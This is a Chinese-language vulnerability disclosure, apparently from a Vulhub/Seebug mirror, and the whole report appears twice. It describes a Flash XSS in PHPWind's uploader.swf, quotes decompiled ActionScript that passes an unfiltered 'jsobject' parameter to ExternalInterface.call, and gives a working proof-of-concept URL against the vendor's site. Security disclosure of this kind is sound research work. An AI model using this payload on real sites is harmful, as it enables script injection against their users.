VULHUB ™

### 简要描述： 最近好多大牛在提交flash相关的漏洞，我也来凑个热闹。 PHPWIND最新的版本使用的一处flash文件存在xss漏洞，pz牛和瘦子牛科普这么多，我就直接上报漏洞吧。 ### 详细说明： 1、文件位置 http://www.phpwind.net/res/images/uploader.swf 2、通过对swf文件反编译得到as代码，查找“ExternalInterface.call”关键函数，在代码中多出使用了这个函数，比如： ``` ExternalInterface.call((this.jsobject + ".initflash")); ``` ， 3、追溯this.jsobject变量，有如下代码： ``` this.jsobject = this.loaderInfo.parameters["jsobject"]; ``` 直接通过loaderInfo.parameters中取，没有进行任何过滤或者检查。 4、直接构造poc http://www.phpwind.net/res/images/uploader.swf?jsobject=alert(1))}catch(e){}// ### 漏洞证明： http://www.phpwind.net/res/images/uploader.swf?jsobject=alert(1))}catch(e){}// [<img src="https://images.seebug.org/upload/201301/23124338bc0d38ee71d341a2a7007f27485ecd90.png" alt="phpwind.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201301/23124338bc0d38ee71d341a2a7007f27485ecd90.png)

### 简要描述： 最近好多大牛在提交flash相关的漏洞，我也来凑个热闹。 PHPWIND最新的版本使用的一处flash文件存在xss漏洞，pz牛和瘦子牛科普这么多，我就直接上报漏洞吧。 ### 详细说明： 1、文件位置 http://www.phpwind.net/res/images/uploader.swf 2、通过对swf文件反编译得到as代码，查找“ExternalInterface.call”关键函数，在代码中多出使用了这个函数，比如： ``` ExternalInterface.call((this.jsobject + ".initflash")); ``` ， 3、追溯this.jsobject变量，有如下代码： ``` this.jsobject = this.loaderInfo.parameters["jsobject"]; ``` 直接通过loaderInfo.parameters中取，没有进行任何过滤或者检查。 4、直接构造poc http://www.phpwind.net/res/images/uploader.swf?jsobject=alert(1))}catch(e){}// ### 漏洞证明： http://www.phpwind.net/res/images/uploader.swf?jsobject=alert(1))}catch(e){}// [<img src="https://images.seebug.org/upload/201301/23124338bc0d38ee71d341a2a7007f27485ecd90.png" alt="phpwind.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201301/23124338bc0d38ee71d341a2a7007f27485ecd90.png)